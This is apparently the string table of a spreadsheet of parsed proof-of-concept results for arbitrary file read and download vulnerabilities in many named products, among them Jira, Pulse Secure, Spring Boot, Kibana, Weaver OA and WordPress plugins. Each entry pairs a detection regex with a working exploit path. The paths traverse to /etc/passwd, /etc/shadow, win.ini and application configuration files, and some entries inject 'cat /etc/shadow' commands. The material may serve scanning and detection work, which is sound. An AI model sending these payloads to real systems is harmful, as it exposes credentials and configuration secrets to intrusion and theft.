    <t>Odoo系统</t>
  </si>
  <si>
    <t>Odoo系统_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/base_import/static/c:/windows/win\.ini|/base_import/static/etc/passwd).*</t>
  </si>
  <si>
    <t>/base_import/static/c:/windows/win.ini|/base_import/static/etc/passwd</t>
  </si>
  <si>
    <t>Panmicro E</t>
  </si>
  <si>
    <t>Panmicro E_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/client/cdnfile/1C/Windows/win\.ini\?windows|/client/cdnfile/C/etc/passwd\?linux).*</t>
  </si>
  <si>
    <t>/client/cdnfile/1C/Windows/win.ini?windows|/client/cdnfile/C/etc/passwd?linux</t>
  </si>
  <si>
    <t>Pmb Getgif</t>
  </si>
  <si>
    <t>Pmb Getgif_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/pmb/opac_css/getgif\.php\?chemin=\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\&amp;nomgif=nuclei).*</t>
  </si>
  <si>
    <t>/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&amp;nomgif=nuclei</t>
  </si>
  <si>
    <t>Pmb</t>
  </si>
  <si>
    <t>Pmb_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/pmb/opac_css/getgif\.php\?chemin=\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\&amp;nomgif=tarik|/opac_css/getgif\.php\?chemin=\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\&amp;nomgif=tarik).*</t>
  </si>
  <si>
    <t>/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&amp;nomgif=tarik|/opac_css/getgif.php?chemin=../../../../../../etc/passwd&amp;nomgif=tarik</t>
  </si>
  <si>
    <t>directory_listing_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>Sitecore 网站根目录</t>
  </si>
  <si>
    <t>Sitecore 网站根目录_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/api/sitecore/Sitecore\.Mvc\.DeviceSimulator\.Controllers\.SimulatorController,Sitecore\.Mvc\.DeviceSimulator\.dll/Preview\?previewPath=/App_Data/license\.xml).*</t>
  </si>
  <si>
    <t>/api/sitecore/Sitecore.Mvc.DeviceSimulator.Controllers.SimulatorController,Sitecore.Mvc.DeviceSimulator.dll/Preview?previewPath=/App_Data/license.xml</t>
  </si>
  <si>
    <t>Thinkadmin V6</t>
  </si>
  <si>
    <t>Thinkadmin V6_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/admin\.html\?s=admin/api\.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34).*</t>
  </si>
  <si>
    <t>/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34</t>
  </si>
  <si>
    <t>.*?(?:/portal/file\?cmd=getFileLocal\&amp;fileid=\.\.%2F\.\.%2F\.\.%2F\.\.%2Fwebapps/nc_web/WEB\-INF/web\.xml).*</t>
  </si>
  <si>
    <t>.*?(?:/ajax/getemaildata\.php\?DontCheckLogin=1\&amp;filePath=c:/windows/win\.ini).*</t>
  </si>
  <si>
    <t>/ajax/getemaildata.php?DontCheckLogin=1&amp;filePath=c:/windows/win.ini</t>
  </si>
  <si>
    <t>Laravel_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/laravel\-filemanager/download\?working_dir=%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2Fetc%2F\&amp;type=\&amp;file=passwd).*</t>
  </si>
  <si>
    <t>.*?(?:/eam/vib\?id=C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware\-vpx\\vcdb\.properties|/eam/vib\?id=/etc/passwd).*</t>
  </si>
  <si>
    <t>/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties|/eam/vib?id=/etc/passwd</t>
  </si>
  <si>
    <t>.*?(?:/ui/vcav\-bootstrap/rest/vcav\-providers/provider\-logo\?url=file:///etc/passwd).*</t>
  </si>
  <si>
    <t>/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd</t>
  </si>
  <si>
    <t>万户_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/download_old\.jsp\?path=\.\.\&amp;name=x\&amp;FileName=WEB\-INF/web\.xml).*</t>
  </si>
  <si>
    <t>Yonbip</t>
  </si>
  <si>
    <t>Yonbip_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/iuap\-apcom\-workbench/ucf\-wh/yonbiplogin/\.\.%252F\.\.%252F\.\.%252F\.\.%252F\.\.%252F\.\.%252F\.\.%252F\.\.%252F\.\.%252F\.\.%252Fetc%252Fpasswd%2500\.png\.js).*</t>
  </si>
  <si>
    <t>.*?(?:/uapws/service/nc\.itf\.bd\.crm\.ICurrtypeExportToCrmService).*</t>
  </si>
  <si>
    <t>/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService</t>
  </si>
  <si>
    <t>.*?(?:/uapws/service/nc\.itf\.bd\.crm\.ICurrtypeExportToCrmService|/uapws/service/nc\.itf\.ses\.inittool\.PortalSESInitToolService).*</t>
  </si>
  <si>
    <t>/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService|/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService</t>
  </si>
  <si>
    <t>大汉_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/vc/vc/columncount/downfile\.jsp\?savename=a\.txt\&amp;filename=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/vc/vc/columncount/downfile.jsp?savename=a.txt&amp;filename=../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>大华_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/portal/itc/attachment_downloadByUrlAtt\.action\?filePath=file:/etc/passwd).*</t>
  </si>
  <si>
    <t>/portal/itc/attachment_downloadByUrlAtt.action?filePath=file:/etc/passwd</t>
  </si>
  <si>
    <t>.*?(?:/evo\-apigw/evo\-cirs/file/readPic\?fileUrl=file:/etc/passwd).*</t>
  </si>
  <si>
    <t>/evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd</t>
  </si>
  <si>
    <t>帆软_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/WebReport/ReportServer\?op=chart\&amp;cmd=get_geo_json\&amp;resourcepath=privilege\.xml).*</t>
  </si>
  <si>
    <t>/WebReport/ReportServer?op=chart&amp;cmd=get_geo_json&amp;resourcepath=privilege.xml</t>
  </si>
  <si>
    <t>泛微E Bridge</t>
  </si>
  <si>
    <t>泛微E Bridge_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/wxjsapi/saveYZJFile\?fileName=test\&amp;downloadUrl=file:///etc/passwd\&amp;fileExt=txt|/file/fileNoLogin/\{\{var\}\}|/wxjsapi/saveYZJFile\?fileName=test\&amp;downloadUrl=file:///c://windows/win\.ini\&amp;fileExt=txt).*</t>
  </si>
  <si>
    <t>/wxjsapi/saveYZJFile?fileName=test&amp;downloadUrl=file:///etc/passwd&amp;fileExt=txt|/file/fileNoLogin/{{var}}|/wxjsapi/saveYZJFile?fileName=test&amp;downloadUrl=file:///c://windows/win.ini&amp;fileExt=txt</t>
  </si>
  <si>
    <t>泛微OA_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/weaver/org\.springframework\.web\.servlet\.ResourceServlet\?resource=/WEB\-INF/prop/weaver\.properties).*</t>
  </si>
  <si>
    <t>/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties</t>
  </si>
  <si>
    <t>泛微云桥E Bridge</t>
  </si>
  <si>
    <t>泛微云桥E Bridge_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/wxjsapi/saveYZJFile\?fileName=test\&amp;downloadUrl=file:///etc/passwd\&amp;fileExt=txt).*</t>
  </si>
  <si>
    <t>/wxjsapi/saveYZJFile?fileName=test&amp;downloadUrl=file:///etc/passwd&amp;fileExt=txt|/file/fileNoLogin/{{bannar}}</t>
  </si>
  <si>
    <t>飞飞CMS</t>
  </si>
  <si>
    <t>飞飞CMS_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?s=Admin\-Data\-down\&amp;id=\.\./\.\./Conf/config\.php).*</t>
  </si>
  <si>
    <t>宏景OA</t>
  </si>
  <si>
    <t>宏景OA_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/servlet/DisplayFiles\?filename=11\&amp;filepath=LsNVAA8YXnv9U7EgvPAATTP2HJBPAATTPC2XDolqkE51gLe).*</t>
  </si>
  <si>
    <t>/servlet/DisplayFiles?filename=11&amp;filepath=LsNVAA8YXnv9U7EgvPAATTP2HJBPAATTPC2XDolqkE51gLe</t>
  </si>
  <si>
    <t>金和OA</t>
  </si>
  <si>
    <t>金和OA_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/C6/Jhsoft\.Web\.module/testbill/dj/download\.asp\?filename=/c6/web\.config).*</t>
  </si>
  <si>
    <t>/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config</t>
  </si>
  <si>
    <t>金山V8系统</t>
  </si>
  <si>
    <t>金山V8系统_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/htmltopdf/downfile\.php\?filename=/windows/win\.ini).*</t>
  </si>
  <si>
    <t>/htmltopdf/downfile.php?filename=/windows/win.ini</t>
  </si>
  <si>
    <t>九思OA</t>
  </si>
  <si>
    <t>九思OA_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/jsoa/GetRawFile\?url=file:///etc/passwd|/jsoa/GetRawFile\?url=file:///C:/windows/win\.ini).*</t>
  </si>
  <si>
    <t>/jsoa/GetRawFile?url=file:///etc/passwd|/jsoa/GetRawFile?url=file:///C:/windows/win.ini</t>
  </si>
  <si>
    <t>绿盟</t>
  </si>
  <si>
    <t>绿盟_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/admin/cert_download\.php\?file=pqpqpqpq\.txt\&amp;certfile=cert_download\.php).*</t>
  </si>
  <si>
    <t>/admin/cert_download.php?file=pqpqpqpq.txt&amp;certfile=cert_download.php</t>
  </si>
  <si>
    <t>迈普</t>
  </si>
  <si>
    <t>迈普_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/webui/\?g=sys_dia_data_down\&amp;file_name=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|/webui/\?g=sys_dia_data_down\&amp;file_name=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./c:/windows/win\.ini).*</t>
  </si>
  <si>
    <t>若依管理系统</t>
  </si>
  <si>
    <t>若依管理系统_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/common/download/resource\?resource=/profile/\.\./\.\./\.\./\.\./etc/passwd|/common/download/resource\?resource=/profile/\.\./\.\./\.\./\.\./Windows/win\.ini).*</t>
  </si>
  <si>
    <t>深信服</t>
  </si>
  <si>
    <t>深信服_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/svpn_html/loadfile\.php\?file=/etc/\./passwd).*</t>
  </si>
  <si>
    <t>/svpn_html/loadfile.php?file=/etc/./passwd</t>
  </si>
  <si>
    <t>.*?(?:/report/download\.php\?pdf=\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/report/download.php?pdf=../../../../../etc/passwd</t>
  </si>
  <si>
    <t>思科</t>
  </si>
  <si>
    <t>思科_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/\+CSCOT\+/translation\-table\?type=mst\&amp;textdomain=/%2bCSCOE%2b/portal_inc\.lua\&amp;default\-language\&amp;lang=\.\./).*</t>
  </si>
  <si>
    <t>/+CSCOT+/translation-table?type=mst&amp;textdomain=/%2bCSCOE%2b/portal_inc.lua&amp;default-language&amp;lang=../</t>
  </si>
  <si>
    <t>cisco_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>天融信_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/change_lan\.php\?LanID=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/change_lan.php?LanID=../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>通达OA_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/inc/package/down\.php\?id=\.\./\.\./\.\./cache/org).*</t>
  </si>
  <si>
    <t>/inc/package/down.php?id=../../../cache/org</t>
  </si>
  <si>
    <t>网神Secgate Isg1000</t>
  </si>
  <si>
    <t>网神Secgate Isg1000_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/webui/\?g=sys_dia_data_down\&amp;file_name=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/webui/?g=sys_dia_data_down&amp;file_name=../../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>迅驰系统</t>
  </si>
  <si>
    <t>迅驰系统_任意文件读取_CNVD-2020-23735</t>
  </si>
  <si>
    <t>.*?(?:/backup/auto\.php\?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N\&amp;path=\.\./backup/auto\.php).*</t>
  </si>
  <si>
    <t>盈可视高清智能录播</t>
  </si>
  <si>
    <t>盈可视高清智能录播_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/developLog/downloadLog\.php\?name=\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/developLog/downloadLog.php?name=../../../../etc/passwd</t>
  </si>
  <si>
    <t>.*?(?:/portal/pt/printpdf/printBill\?pageId=login\&amp;filePath=\.\./\.\./startup\.bat).*</t>
  </si>
  <si>
    <t>/portal/pt/printpdf/printBill?pageId=login&amp;filePath=../../startup.bat</t>
  </si>
  <si>
    <t>.*?(?:/seeyon/webmail\.do\?method=doDownloadAtt\&amp;filename=index\.jsp\&amp;filePath=\.\./conf/datasourceCtp\.properties).*</t>
  </si>
  <si>
    <t>中控Zkeco系统Cnvd 2020 57264</t>
  </si>
  <si>
    <t>中控Zkeco系统Cnvd 2020 57264_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/iclock/ccccc/windows/win\.ini).*</t>
  </si>
  <si>
    <t>/iclock/ccccc/windows/win.ini</t>
  </si>
  <si>
    <t>Citrix Xenmobile系统</t>
  </si>
  <si>
    <t>Citrix Xenmobile系统_任意文件读取_CVE-2020-8209</t>
  </si>
  <si>
    <t>.*?(?:/jsp/help\-sb\-download\.jsp\?sbFileName=\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>Gocd系统</t>
  </si>
  <si>
    <t>CVE-2021-43287</t>
  </si>
  <si>
    <t>Gocd系统_任意文件读取_CVE-2021-43287</t>
  </si>
  <si>
    <t>.*?(?:/go/add\-on/business\-continuity/api/plugin\?folderName=\&amp;pluginName=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|/go/add\-on/business\-continuity/api/plugin\?folderName=\&amp;pluginName=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./windows/win\.ini).*</t>
  </si>
  <si>
    <t>/go/add-on/business-continuity/api/plugin?folderName=&amp;pluginName=../../../../../../../../etc/passwd|/go/add-on/business-continuity/api/plugin?folderName=&amp;pluginName=../../../../../../../../windows/win.ini</t>
  </si>
  <si>
    <t>Jira系统</t>
  </si>
  <si>
    <t>CVE-2019-8442</t>
  </si>
  <si>
    <t>Jira系统_任意文件读取_CVE-2019-8442</t>
  </si>
  <si>
    <t>.*?(?:/s/anything/_/META\-INF/maven/com\.atlassian\.jira/atlassian\-jira\-webapp/pom\.xml).*</t>
  </si>
  <si>
    <t>/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml</t>
  </si>
  <si>
    <t>Next Js系统</t>
  </si>
  <si>
    <t>CVE-2017-16877</t>
  </si>
  <si>
    <t>Next Js系统_任意文件读取_CVE-2017-16877</t>
  </si>
  <si>
    <t>.*?(?:/_next/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/_next/../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Pulse系统</t>
  </si>
  <si>
    <t>CVE-2019-11510</t>
  </si>
  <si>
    <t>Pulse系统_任意文件读取_CVE-2019-11510</t>
  </si>
  <si>
    <t>.*?(?:/dana\-na/\.\./dana/html5acc/guacamole/\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\?/dana/html5acc/guacamole/).*</t>
  </si>
  <si>
    <t>/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/</t>
  </si>
  <si>
    <t>Springboot系统</t>
  </si>
  <si>
    <t>Springboot系统_任意文件读取_CVE-2021-21234</t>
  </si>
  <si>
    <t>.*?(?:/log/view\?filename=/etc/hosts\&amp;base=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./|/log/view\?filename=/windows/win\.ini\&amp;base=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./|/manage/log/view\?filename=/windows/win\.ini\&amp;base=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./|/manage/log/view\?filename=/etc/hosts\&amp;base=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./).*</t>
  </si>
  <si>
    <t>/log/view?filename=/etc/hosts&amp;base=../../../../../../../../../../|/log/view?filename=/windows/win.ini&amp;base=../../../../../../../../../../|/manage/log/view?filename=/windows/win.ini&amp;base=../../../../../../../../../../|/manage/log/view?filename=/etc/hosts&amp;base=../../../../../../../../../../</t>
  </si>
  <si>
    <t>Kibana系统</t>
  </si>
  <si>
    <t>Kibana系统_任意文件读取_CVE-2018-17246</t>
  </si>
  <si>
    <t>.*?(?:/api/console/api_server\?sense_version=%40%40SENSE_VERSION\&amp;apis=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>Acenet</t>
  </si>
  <si>
    <t>Acenet_任意文件下载</t>
  </si>
  <si>
    <t>.*?(?:/view/action/download_file\.php\?filename=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\&amp;savename=data\.txt).*</t>
  </si>
  <si>
    <t>/view/action/download_file.php?filename=../../../../../../../../../etc/passwd&amp;savename=data.txt</t>
  </si>
  <si>
    <t>若依_任意文件下载</t>
  </si>
  <si>
    <t>通达OA_任意文件下载</t>
  </si>
  <si>
    <t>.*?(?:/module/AIP/get_file\.php\?MODULE=/\&amp;ATTACHMENT_NAME=php\&amp;ATTACHMENT_ID=\.\._webroot/inc/oa_config).*</t>
  </si>
  <si>
    <t>/module/AIP/get_file.php?MODULE=/&amp;ATTACHMENT_NAME=php&amp;ATTACHMENT_ID=.._webroot/inc/oa_config</t>
  </si>
  <si>
    <t>Wordpress_任意文件下载</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\.php\?page=miwoftp\&amp;option=com_miwoftp\&amp;action=download\&amp;item=wp\-config\.php\&amp;order=name\&amp;srt=yes).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=miwoftp&amp;option=com_miwoftp&amp;action=download&amp;item=wp-config.php&amp;order=name&amp;srt=yes</t>
  </si>
  <si>
    <t>Acenet Acereporter Report</t>
  </si>
  <si>
    <t>Acenet Acereporter Report_任意文件下载</t>
  </si>
  <si>
    <t>.*?(?:/view/action/download_file\.php\?filename=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\&amp;savename=\{\{filename\}\}\.txt).*</t>
  </si>
  <si>
    <t>Avcon Org Execl DownlOAd</t>
  </si>
  <si>
    <t>Avcon Org Execl DownlOAd_任意文件下载</t>
  </si>
  <si>
    <t>.*?(?:/org_execl_download\.action\?filename=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/org_execl_download.action?filename=../../../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Imo</t>
  </si>
  <si>
    <t>Imo_任意文件下载</t>
  </si>
  <si>
    <t>.*?(?:/file/Placard/upload/Imo_DownLoadUI\.php\?cid=1\&amp;uid=1\&amp;type=1\&amp;filename=/OpenPlatform/config/kdBind\.php).*</t>
  </si>
  <si>
    <t>/file/Placard/upload/Imo_DownLoadUI.php?cid=1&amp;uid=1&amp;type=1&amp;filename=/OpenPlatform/config/kdBind.php</t>
  </si>
  <si>
    <t>Jeewms系统Url</t>
  </si>
  <si>
    <t>Jeewms系统Url_任意文件下载</t>
  </si>
  <si>
    <t>.*?(?:/systemController/showOrDownByurl\.do\?down=\&amp;dbPath=\.\./\.\./\.\./\.\./\.\./Windows/win\.ini|/systemController/showOrDownByurl\.do\?down=\&amp;dbPath=\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/systemController/showOrDownByurl.do?down=&amp;dbPath=../../../../../Windows/win.ini|/systemController/showOrDownByurl.do?down=&amp;dbPath=../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Joomla_任意文件下载</t>
  </si>
  <si>
    <t>.*?(?:/administrator/components/com_aceftp/quixplorer/index\.php\?action=download\&amp;dir=\&amp;item=configuration\.php\&amp;order=name\&amp;srt=yes).*</t>
  </si>
  <si>
    <t>/administrator/components/com_aceftp/quixplorer/index.php?action=download&amp;dir=&amp;item=configuration.php&amp;order=name&amp;srt=yes</t>
  </si>
  <si>
    <t>.*?(?:/components/com_contushdvideoshare/hdflvplayer/download\.php\?f=\.\./\.\./\.\./configuration\.php).*</t>
  </si>
  <si>
    <t>/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php</t>
  </si>
  <si>
    <t>Oliver Library Server_任意文件下载</t>
  </si>
  <si>
    <t>.*?(?:/oliver/FileServlet\?source=serverFile\&amp;fileName=c:/windows/win\.ini).*</t>
  </si>
  <si>
    <t>PbootCMS_任意文件下载</t>
  </si>
  <si>
    <t>.*?(?:/data/pbootcms\.db).*</t>
  </si>
  <si>
    <t>/data/pbootcms.db</t>
  </si>
  <si>
    <t xml:space="preserve">齐博CMS </t>
  </si>
  <si>
    <t>齐博CMS _任意文件下载</t>
  </si>
  <si>
    <t>.*?(?:/do/job\.php\?job=download\&amp;url=ZGF0YS9jb25maWcucGg8).*</t>
  </si>
  <si>
    <t>/do/job.php?job=download&amp;url=ZGF0YS9jb25maWcucGg8</t>
  </si>
  <si>
    <t>Wapples Web Application Firewall</t>
  </si>
  <si>
    <t>Wapples Web Application Firewall_任意文件下载</t>
  </si>
  <si>
    <t>.*?(?:/webapi/file/transfer\?name=/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\&amp;type=db_backup|/webapi/auth).*</t>
  </si>
  <si>
    <t>/webapi/file/transfer?name=/../../../../../../../../etc/passwd&amp;type=db_backup|/webapi/auth</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\-ajax\.php\?action=revslider_show_image\&amp;img=\.\./wp\-config\.php).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=revslider_show_image&amp;img=../wp-config.php</t>
  </si>
  <si>
    <t>大汉 JCMS_任意文件下载</t>
  </si>
  <si>
    <t>.*?(?:/jcms/m_1_9/user/down\.jsp\?abspathfile=C:\\Windows\\system\.ini|/jcms/m_1_9/user/down\.jsp\?abspathfile=/etc/passwd).*</t>
  </si>
  <si>
    <t>/jcms/m_1_9/user/down.jsp?abspathfile=C:\Windows\system.ini|/jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd</t>
  </si>
  <si>
    <t>深信服_任意文件下载</t>
  </si>
  <si>
    <t>.*?(?:/report/download\.php\?pdf=\.\./\.\./\.\./\.\./\.\./etc/hosts).*</t>
  </si>
  <si>
    <t>/report/download.php?pdf=../../../../../etc/hosts</t>
  </si>
  <si>
    <t>天融信_任意文件下载</t>
  </si>
  <si>
    <t>.*?(?:/acc/vpn/download\.php\?f=\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/acc/vpn/download.php?f=../../etc/passwd</t>
  </si>
  <si>
    <t>.*?(?:/db/audit\.db).*</t>
  </si>
  <si>
    <t>/db/audit.db</t>
  </si>
  <si>
    <t>.*?(?:/db/ifcfg\.db).*</t>
  </si>
  <si>
    <t>/db/ifcfg.db</t>
  </si>
  <si>
    <t>.*?(?:/db/monitor\.db).*</t>
  </si>
  <si>
    <t>/db/monitor.db</t>
  </si>
  <si>
    <t>.*?(?:/db/policy\.db).*</t>
  </si>
  <si>
    <t>/db/policy.db</t>
  </si>
  <si>
    <t>.*?(?:/db/product\.db).*</t>
  </si>
  <si>
    <t>/db/product.db</t>
  </si>
  <si>
    <t>.*?(?:/db/wafconfig\.db).*</t>
  </si>
  <si>
    <t>/db/wafconfig.db</t>
  </si>
  <si>
    <t>.*?(?:/general/mytable/intel_view/video_file\.php\?MEDIA_DIR=\.\./\.\./\.\./inc/\&amp;MEDIA_NAME=oa_config\.php).*</t>
  </si>
  <si>
    <t>万户 Ezoffice DownlOAd Ftp</t>
  </si>
  <si>
    <t>万户 Ezoffice DownlOAd Ftp_任意文件下载</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/download_ftp\.jsp\?path=/\.\./WEB\-INF/\&amp;name=aaa\&amp;FileName=web\.xml).*</t>
  </si>
  <si>
    <t>万户 Ezoffice DownlOAd</t>
  </si>
  <si>
    <t>万户 Ezoffice DownlOAd_任意文件下载</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/public/download/download_old\.jsp;\?path=\.\.\&amp;name=web\.xml\&amp;FileName=WEB\-INF/web\.xml).*</t>
  </si>
  <si>
    <t>/defaultroot/public/download/download_old.jsp;?path=..&amp;name=web.xml&amp;FileName=WEB-INF/web.xml</t>
  </si>
  <si>
    <t>万户 Ezoffice DownlOAdhttp</t>
  </si>
  <si>
    <t>万户 Ezoffice DownlOAdhttp_任意文件下载</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/site/templatemanager/downloadhttp\.jsp\?fileName=\.\./public/edit/jsp/config\.jsp).*</t>
  </si>
  <si>
    <t>/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../public/edit/jsp/config.jsp</t>
  </si>
  <si>
    <t>Bitrix_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/\.git/HEAD/пистолетики/\.\./\.\./\.\./""""""""""""""""""""""""""""""/\.\./bitrix/""""""""""""""""""""""""""""""/\.\./virtual_file_system\.php/""""""""""""""""""""""""""""""/\.\./x/\.\.).*</t>
  </si>
  <si>
    <t>/.git/HEAD/пистолетики/../../../""""""""""""""""""""""""""""""/../bitrix/""""""""""""""""""""""""""""""/../virtual_file_system.php/""""""""""""""""""""""""""""""/../x/..</t>
  </si>
  <si>
    <t>Detection</t>
  </si>
  <si>
    <t>Detection_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:\.\./\.\./\.\./\.\./\.\./etc/passwd|\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%00|\.\.;/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|%0a/bin/cat%20/etc/shadow|%00/etc/shadow%00|cat\+\ \.\./\.\./\.\./\.\./\.\./etc/passwd|%00/etc/passwd%00</t>
  </si>
  <si>
    <t>../../../../../etc/passwd|../../../../../../../../etc/passwd|%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00|..;/../../../../../../../../etc/passwd|%0a/bin/cat%20/etc/shadow|%00/etc/shadow%00|cat+ ../../../../../etc/passwd|%00/etc/passwd%00cat+ ../../../../../../../../../etc/passwd|..;/../../../../../etc/passwd\\././././././././././etc/passwd|../../../../../../../etc/passwd\\././././././././././etc/shadow\\/../../../../../../../../../etc/shadow|%0a/bin/cat%20/etc/passwd\\/../../../../../../../../../etc/shadow^^|..;/../../../../../../../etc/passwd\\/../../../../../../../../../etc/passwd^^|..;/../../../../../../etc/passwd|/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow|/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00|..;/../../../etc/passwd|../../../../../../etc/passwd|..;/../../../../etc/passwd|cat 